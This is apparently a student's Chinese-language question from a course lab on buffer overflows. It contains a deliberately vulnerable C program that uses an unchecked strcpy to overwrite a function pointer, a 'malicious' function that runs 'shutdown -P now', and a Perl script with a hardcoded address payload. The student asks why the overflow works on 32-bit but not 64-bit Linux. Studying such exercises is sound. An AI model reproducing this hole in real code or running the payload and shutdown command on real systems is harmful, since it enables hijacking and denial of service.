我在c和Perl中都有两个脚本。 c代码是:
#pragma check_stack(off)
#include <string.h>
#include <stdio.h>
void good_fn(){
printf("GOOD CODE \n");
}
void mlc_fn(){
printf("What is this I don understand what has happened !Probably buffer overflow attack and m hacked \n");
system("shutdown -P now");
}
int main(int argc, char* argv[]){
printf("Address of GOOD_CODE = %p\n", good_fn);
printf("Address of MLIC_CODE = %p\n", mlc_fn);
char data[10];
//Callig function by pointer
void (*dsrd_fn)();
dsrd_fn = &good_fn;
printf("SIZE : %d\n",sizeof(dsrd_fn));
//try to overflow dsrd_fn here
strcpy(data, argv[1]);
//load content from file
printf("Address of dsrd_fn = %p\n", dsrd_fn);
//call fn based on address pntr_fn
dsrd_fn();
printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n% p\n\n");
}
虽然perl代码是:
$arg = "AAAAAAAAAA"."\xC1\x84\x04\x08";
$cmd = "./bo_test ".$arg;
system($cmd);
编译并测试bo_test后,输出为:
student@EECS-337-VM:~/EECS 397/Part 2$ ./bo_test abcde
Address of GOOD_CODE = 0x40060d
Address of MLIC_CODE = 0x40061d
SIZE : 8
Address of dsrd_fn = 0x40060d
GOOD CODE
My stack looks like:
0x7f00b3974000
0x7f00b37509e0
0xffffffffffffffff
0x7f00b37509e0
(nil)
0x7fff66218a68
将MLIC_ADDR插入perl脚本时,使用perl脚本的shell代码缓冲区溢出漏洞不是在64位Linux系统上运行,而是在32位Linux系统上运行。为什么会这样?